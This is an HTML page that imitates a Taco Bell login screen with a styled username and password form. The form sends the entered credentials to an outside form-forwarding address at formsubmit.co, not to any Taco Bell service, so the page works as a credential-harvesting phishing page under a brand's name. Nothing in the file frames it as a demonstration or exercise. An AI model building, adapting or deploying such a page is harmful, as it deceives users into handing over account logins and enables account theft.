<!DOCTYPE html> 
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <style media="screen">
        body{
            margin: 0;
            padding: 0;
            font-family: sans-serif;
            background-image: url(tacoBackGround.jpg);
            background-size: cover;
        }
        .box{
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%,-50%);
            width: 400px;
            padding: 40px;
            background: rgba(231, 22, 22, 1);
            box-sizing: border-box;
            box-shadow: 0 15px 25px rgba(231, 22, 22, 0.5);
            border-radius: 10px;
        }

        .box h2{
            margin: 0 0 30px;
            padding: 0px;
            color: #fff;
            text-align: center;
        }

        .box .input-box{
            position: relative;
        }

        .box .input-box input{
            width: 100%;
            padding: 10px 0px;
            font-size: 16px;
            color: #fff;
            letter-spacing: 1px;
            margin-bottom: 30px;
            border: none;
            outline: none;
            background: transparent;
            border-bottom: 1px solid #fff;
        }

        .box .input-box label{
            position: absolute;
            top: 0;
            left: 0;
            letter-spacing: 1px;
            padding: 10px 0px;
            font-size: 16px;
            color: #fff;
            transition: .5s;
        }
        .box .input-box input:focus ~ label,
        .box .input-box input:valid ~ label{
            top: -18px;
            left: 0px;
            color: #fff;
            font-size: 12px;
        }

        .box input[type="submit"]{
            background: transparent;
            border: none;
            outline: none;
            color: #ff0000;
            background:#fff;
            padding: 10px 20px;
            border-radius: 5px;
            cursor:pointer;
        }
        </style>
    <title>Document</title>
</head>
<body>
    <div class="box">
        <h2>TacoBell Login</h2>
        <form action="https://formsubmit.co/7d3e63199d8c4a04677ae34a361dadc5" method="POST">
            <div class="input-box">
                <input type="text" id="username" name="username" autocomplete="off" required>
                <label for="">Username</label>
            </div>
            <div class="input-box">
                <input type="password" id="password" name="email" autocomplete="off" required>
                <label for="">Password</label>
            </div>
                <input type="submit">
        </form>
    </div>
</body>